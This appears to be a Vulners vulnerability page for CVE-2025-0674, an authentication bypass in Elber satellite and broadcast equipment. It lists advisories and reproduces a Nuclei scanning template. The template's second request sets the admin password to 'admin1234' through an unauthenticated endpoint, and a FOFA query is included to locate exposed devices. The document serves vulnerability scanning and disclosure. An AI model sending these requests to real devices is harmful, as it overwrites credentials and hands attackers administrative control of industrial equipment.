| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| The vulnerability of Elber Communications Equipment’s software products lies in their ability to bypass the authentication process by using an alternative path or channel. This allows attackers to circumvent the authentication procedures. | 14 May 202500:00 | – | bdu_fstec | |
| CVE-2025-0674 | 4 Feb 202511:00 | – | circl | |
| Elber Communications Equipment 安全漏洞 | 7 Feb 202500:00 | – | cnnvd | |
| CVE-2025-0674 | 6 Feb 202523:42 | – | cve | |
| CVE-2025-0674 Elber Communications Equipment Authentication Bypass Using an Alternate Path or Channel | 6 Feb 202523:42 | – | cvelist | |
| CVE-2025-0674 | 7 Feb 202500:15 | – | nvd | |
| PT-2025-5690 · Elber · Elber | 4 Feb 202500:00 | – | ptsecurity | |
| CVE-2025-0674 | 9 Feb 202500:24 | – | redhatcve | |
| VulnCheck KEV: CVE-2025-0674 | 18 Jul 202500:00 | – | vulncheck_kev | |
| CVE-2025-0674 Elber Communications Equipment Authentication Bypass Using an Alternate Path or Channel | 6 Feb 202523:42 | – | vulnrichment |
id: CVE-2025-0674
info:
name: Elber ESE DVB-S/S2 - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
Multiple Elber products are affected by an authentication bypass vulnerability which allows unauthorized access to the password management functionality. Attackers can exploit this issue by manipulating the endpoint to overwrite any user's password within the system.
remediation: |
Apply security patches from Elber or restrict access to the password management endpoints to authorized networks only.
impact: |
This grants them unauthorized administrative access to protected areas of the application, compromising the device's system security.
reference:
- https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-03
- https://github.com/eeeeeeeeee-code/POC/blob/main/wpoc/wayber/Elber-Wayber%E6%A8%A1%E6%8B%9F%E6%95%B0%E5%AD%97%E9%9F%B3%E9%A2%91%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E.md?plain=1
- https://nvd.nist.gov/vuln/detail/CVE-2025-0674
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-0674
cwe-id: CWE-288
epss-score: 0.03523
epss-percentile: 0.87823
metadata:
verified: true
max-request: 1
fofa-query: title="Elber Satellite Equipment" || body="www.elber.it"
tags: cve,cve2025,auth-bypass,elber,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /modules/pwd.html HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "Manage system Password"
internal: true
- raw:
- |
GET /json_data/set_pwd?lev=2&pass=admin1234 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "Apply successfully"
# digest: 4a0a00473045022037830ac7122fc7808361b79af02f4b4145668bfbcceafd9ecc674efaecf442e2022100adc6a82b0fdae194ce9b857b6966ea22c4d81b9507fc84e3fb68fb1f555ef7db:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation